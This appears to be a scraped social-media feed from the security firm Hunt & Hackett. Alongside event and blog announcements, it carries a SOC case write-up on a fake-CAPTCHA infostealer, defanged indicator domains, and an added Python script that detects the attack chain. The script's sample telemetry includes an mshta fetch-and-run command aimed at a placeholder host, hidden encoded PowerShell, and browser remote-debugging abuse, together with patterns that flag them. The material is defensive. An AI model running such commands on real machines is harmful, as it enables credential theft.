Hunt & Hackett

@huntandhackett
46 Followers
0 Following
99 Posts

Last week, ENISA released its Threat Landscape 2025.

It offers a detailed look at how Europe’s cyber ecosystem is evolving. The picture that emerges shows growing strain, where interconnected systems and persistent threats keep testing resilience.

Among the developments: faketivism blurring lines between actors, phishing services lowering barriers, and AI reshaping how attacks unfold.

📄 Read the report here: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025

ENISA Threat Landscape 2025 | ENISA

ENISA is the EU agency dedicated to enhancing cybersecurity in Europe. They offer guidance, tools, and resources to safeguard citizens and businesses from cyber threats.

๐Ÿ” New #blogpost

At H2, we recently moved from authenticator apps to #YubiKey (FIDO2) for company-wide MFA in Entra ID.

Why? Because it enables phishing-resistant, passwordless sign-ins at scale, raising the bar for our security.

But this move didn't come without its challenges. Read about our journey here: https://www.huntandhackett.com/blog/raising-security-with-yubikey

Raising security with organization-wide YubiKey (FIDO2) in Entra ID

Cyber espionage reaches far beyond governments, it impacts more organisations than you think.

At our next CyberConnect on Sept 9 in The Hague, we’ll share real investigations, explain why even low-profile orgs are targeted, and give a live demo on tracking campaigns.

Seats are limited. Sign up today: https://www.huntandhackett.com/understanding-cyber-espionage

#CyberSecurity #ThreatIntelligence #CyberEspionage

โš ๏ธ The Hacker News just spotlighted a growing threat: SEO poisoning campaigns delivering malware through fake tool websites.

Attackers are mimicking trusted apps like PuTTY, Zoom, and ChatGPT, pushing them high in search results. Over 8,500 SMB users were targeted in just four months.

The article breaks it down clearly. If you haven’t read it yet, it’s worth your time.

Read it here: https://thehackernews.com/2025/07/seo-poisoning-campaign-targets-8500.html

SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools

SEO poisoning delivers trojanized tools, targeting SMBs and spreading malware via fake websites

The Hacker News

👤 Threat Actor Profile: Sandworm

Linked to Russia’s GRU and active in 60+ countries, Sandworm targets critical infrastructure with sabotage, espionage, and disruption. 🇷🇺

🔗 Curious to learn more about this APT? Explore their threat profile in our Members' Portal: https://www.huntandhackett.com/members/actors/sandworm

🔗 Not a Member yet? Sign up today: https://www.huntandhackett.com/members/register

🚨 New #blogpost: This week we're unpacking our journey of using open-source software to build an innovative cloud-based IR lab from scratch, highlighting key obstacles we encountered along the road and explaining how we transformed these into opportunities.

We share:
🔶 Velociraptor + Dissect hiccups;
🔶 Misinterpretation of IPv6 addresses in Linux UTMP logs;
🔶 Enhancing Timesketch for large-scale investigations.

🔗 https://www.huntandhackett.com/blog/turning-incident-response-challenges-into-scalable-solutions

Turning incident response challenges into scalable solutions

Find out how Hunt & Hackett transforms incident response challenges into scalable solutions using open-source software and a DevOps mindset.

Launching #DetectionsFromTheSOC 🚀

We're excited to announce our new series, Detections from the SOC, in which we share a behind-the-scenes look at how our SOC detects, investigates, and responds to real-world threats.

Case #1: Infostealer via fake CAPTCHA

We intercepted an attack where the intruder didn’t break in, but logged in. The entry point? A fake “I’m not a robot” CAPTCHA prompt.

👉 Want to read the full story? Head on over to our LinkedIn to check it out: https://www.linkedin.com/feed/update/urn:li:activity:7336321179005165568

#detectionsfromthesoc #captcha #infostealer #cryptbot #soc #bec | Hunt & Hackett

Launching #DetectionsFromTheSOC 🚀 We're happy to announce our new series, Detections from the SOC, in which we share a behind-the-scenes look at how our SOC detects, investigates, and responds to real-world threats.

For our first edition: infostealer deployed via fake Captcha

In the middle of the night, Hunt & Hackett’s 24/7 SOC intercepted the early stages of a broader cyberattack. The attacker didn’t break in, but logged in.

An endpoint was compromised using a fake #CAPTCHA page – you know, one of those “I’m not a robot” checks. Only this one tricked the user into running a command via the keyboard shortcut Win + R. That command launched a hidden process and deployed a known #infostealer, likely #Cryptbot.

What happened?

Our SOC flagged a suspicious mshta.exe process making an outbound connection to a previously unknown domain. This quickly escalated:
👉 User was tricked into copy-pasting a command that secretly launched mshta.exe
👉 mshta.exe triggered PowerShell, which contacted additional anomalous domains and executed fileless malware
👉 PowerShell launched Chrome/Edge with the --remote-debugging-port=9203 flag – a known abuse method to extract browser credentials
👉 The process accessed files in the Downloads folder

All signs pointed to credential theft and system reconnaissance.

How we detected it:

One of our behavioural detection rules flagged:
👉 Use of mshta.exe in user context reaching unknown domains
👉 Obfuscated PowerShell activity
👉 Abuse of --remote-debugging-port in Chrome – a known credential-stealing tactic

This combination triggered a high-confidence detection, prompting an alert at our #SOC and enabling a fast response & remediation – even at 3AM.

Remediation:
👉 Clean install of the endpoint
👉 Blocked malicious domains
👉 Revoked all sessions and reset credentials

This case shows how infostealers can be the first step in modern attacks, giving threat actors access to credentials, browser sessions, and local files. From there, they can move laterally, escalate privileges, and pave the way for bigger attacks like ransomware or business email compromise (#BEC) without you knowing it. In short: infostealers are a launchpad for full-scale breaches.

IOCs:
👾 hxxps[:]//afliam[.]shop
👾 b[.]watchcollision[.]xyz
👾 blisspicks[.]shop
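The post describes a behavioural rule that fires on the combination of three signals (mshta.exe reaching an unknown domain from a user context, obfuscated PowerShell, and a browser started with --remote-debugging-port) rather than on any one of them. The script below is an added illustration of that correlation logic, written for this page and not Hunt & Hackett's own detection rule. The event schema, the allowlist of known domains, the ten-minute window, the "three or more signals" threshold and the sample telemetry are all constructed assumptions; it includes a second host where a developer launches a browser with remote debugging on its own, to show why a single signal is not escalated.

```python
"""Correlating endpoint telemetry for the fake-CAPTCHA infostealer chain.

Added example for this page; not Hunt & Hackett's rule. Event fields mimic
process-creation and network-connection telemetry; every value is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Event:
    ts: int                    # seconds since epoch (constructed)
    host: str
    kind: str                  # "process" or "network"
    image: str                 # process image name, lowercased
    parent: str = ""           # parent image for process events
    cmdline: str = ""
    dest: str = ""             # destination domain for network events
    user_context: bool = True  # True when the process runs as an interactive user

# Constructed allowlist: destinations the organisation already knows.
KNOWN_DOMAINS = {"login.microsoftonline.com", "update.microsoft.com"}

def is_unknown_domain(dest: str) -> bool:
    return bool(dest) and dest not in KNOWN_DOMAINS

def looks_obfuscated_powershell(cmdline: str) -> bool:
    # Coarse markers of hidden/encoded PowerShell invocation (assumption: good enough for the demo).
    c = cmdline.lower()
    return any(tok in c for tok in ("-enc", "-encodedcommand", "frombase64string", "-w hidden"))

def remote_debug_flag(cmdline: str) -> bool:
    return "--remote-debugging-port" in cmdline.lower()

def correlate(events: List[Event], window: int = 600, threshold: int = 3) -> Dict[str, dict]:
    """Per host: which signals were seen, and whether enough of them fell inside `window` seconds."""
    by_host: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_host[e.host].append(e)

    findings: Dict[str, dict] = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        first_seen: Dict[str, int] = {}   # signal name -> first timestamp
        for e in evs:
            if e.kind == "network" and e.image == "mshta.exe" and e.user_context and is_unknown_domain(e.dest):
                first_seen.setdefault("mshta_unknown_domain", e.ts)
            if e.kind == "process" and e.image == "powershell.exe" and e.parent == "mshta.exe":
                first_seen.setdefault("powershell_from_mshta", e.ts)
            if e.kind == "process" and e.image == "powershell.exe" and looks_obfuscated_powershell(e.cmdline):
                first_seen.setdefault("obfuscated_powershell", e.ts)
            if e.kind == "process" and e.image in ("chrome.exe", "msedge.exe") and remote_debug_flag(e.cmdline):
                first_seen.setdefault("browser_remote_debugging", e.ts)
        if first_seen:
            span = max(first_seen.values()) - min(first_seen.values())
            findings[host] = {
                "signals": sorted(first_seen),
                "high_confidence": len(first_seen) >= threshold and span <= window,
            }
    return findings

# Constructed sample telemetry. WS-042 follows the chain from the post; DEV-07 is a
# developer starting a browser with remote debugging; WS-099 is ordinary activity.
SAMPLE_EVENTS = [
    Event(1000, "WS-042", "process", "mshta.exe", parent="explorer.exe", cmdline="mshta https://unknown-cdn.invalid/x"),
    Event(1002, "WS-042", "network", "mshta.exe", dest="unknown-cdn.invalid"),
    Event(1010, "WS-042", "process", "powershell.exe", parent="mshta.exe", cmdline="powershell -w hidden -enc AAAA"),
    Event(1090, "WS-042", "process", "chrome.exe", parent="powershell.exe", cmdline="chrome.exe --remote-debugging-port=9203"),
    Event(2000, "DEV-07", "process", "msedge.exe", parent="explorer.exe", cmdline="msedge.exe --remote-debugging-port=9222"),
    Event(3000, "WS-099", "network", "msedge.exe", dest="login.microsoftonline.com"),
]

if __name__ == "__main__":
    for host, f in correlate(SAMPLE_EVENTS).items():
        level = "HIGH" if f["high_confidence"] else "low"
        print(f"{host}: {level} confidence, signals={f['signals']}")
```

Running it reports WS-042 as high confidence with all four signals inside the window, DEV-07 as low confidence on the single remote-debugging signal, and nothing for WS-099. A production rule would replace the static allowlist with the organisation's own baseline of observed destinations and tune the window and threshold to its telemetry volume.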

🎤 We’re proud to sponsor and speak at Hague TIX on June 10!

The event is a focused gathering of Europe’s top threat intelligence minds.

We'll explore Europe’s path to cyber resilience and strategic autonomy, and dive into Lazarus and SeaTurtle operations in the Netherlands.

#CyberSecurity #ThreatIntel #HagueTIX #APT

Our next CyberConnect session is coming up: Security in Motion!

In this session, tailored for security, IT, and risk professionals, we explore how changing geopolitical dynamics, growing technological dependencies, and new attack techniques are raising the bar for digital resilience.

Visit our website for more information and to sign up: https://www.huntandhackett.com/security-in-beweging

Security in Motion | Hunt & Hackett

Discover how geopolitical tensions, technological dependencies and changing attack techniques are raising the requirements for digital resilience.

🚨 New blog!

In it, we dive into reverse-engineering AFD.sys (a hidden part of Windows networking) to surface live socket data from other processes. This unlocks new capabilities for forensics, debugging, and reverse engineering.

📃 Read it here: https://www.huntandhackett.com/blog/improving_afd_socket_visibility

🔧 Explore our tool: https://github.com/huntandhackett/AfdSocketViewer

Improving AFD Socket Visibility for Windows Forensics & Troubleshooting

This blog post explains the basics of the Ancillary Function Driver API and how it can help explore networking activity on Windows systems.